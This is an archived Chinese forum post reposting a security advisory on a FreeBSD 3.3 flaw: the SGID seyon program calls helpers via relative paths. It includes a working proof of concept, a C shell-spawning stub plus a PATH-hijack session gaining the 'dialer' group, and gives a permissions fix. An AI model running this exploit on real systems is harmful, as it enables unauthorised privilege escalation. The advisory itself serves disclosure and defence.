精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>FreeBSD 3.3 seyon漏洞

主题:FreeBSD 3.3 seyon漏洞
发信人: [email protected]()
整理人: williamlong(2000-03-16 13:02:45), 站内信件

FreeBSD 3.3 seyon漏洞

  概述: 

  FreeBSD 3.3-RELEASE版的安装光盘中带有seyon v2.14b软件包。这个版本(
包含以前?)存在安全漏洞,
允许任意用户获得seyon所属组的特权。当缺省安装时,seyon被设置了SGID位 "
dialer". 

  注意:不同版本的seyon和不同的2.14b包可能被设置了不同的属性。

  漏洞详述: 

  syon执行时会先执行"seyon-emu"和"xterm",但这两个程序的路径并没有用
绝对路径,因此通过在$PATH中
增加一个用户可写目录并将用户自己的"seyon-emu"或"xterm"放到该目录下。 


  用户就可以让seyon以组ID "dialer"的身份来运行它们,从而获得"dialer"组
的特权。 

  漏洞实例: 

  bash-2.03$ uname -a; id; ls -la `which seyon` 
  FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GM
T 1999 
  [email protected]:/usr/src/sys/compile/GENERIC i386 
  uid=1000(xnec) gid=1000(xnec) groups=1000(xnec) 
  -rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon 
  bash-2.03$ cat > seyonx.c 
  void main () { 
  setregid(getegid(), getegid()); 
  system("/usr/local/bin/bash"); 
  } 
  ^D 
  bash-2.03$ gcc -o seyon-emu seyonx.c 
  bash-2.03$ PATH=.:$PATH 
  bash-2.03$ seyon 
  bash-2.03$ id 
  uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec) 
  bash-2.03$ 

  解决方案: 

  chmod 750 `which seyon` 并将需要运行seyon的用户增加到"dialer"组中。


  来源:Brock Tellier ([email protected]


                     

--
欢迎大家常来回合策略  宗教信仰坐坐。
欢迎光临
魔法师学院http://wwwmagic.126.com
    
*    *    *    *    *
       
无挂碍故无有恐怖
                --
DOS--
                                      

※ 来源:.网易虚拟社区北京站 http://bj.netease.com.[FROM: 202.106.250.252]

[关闭][返回]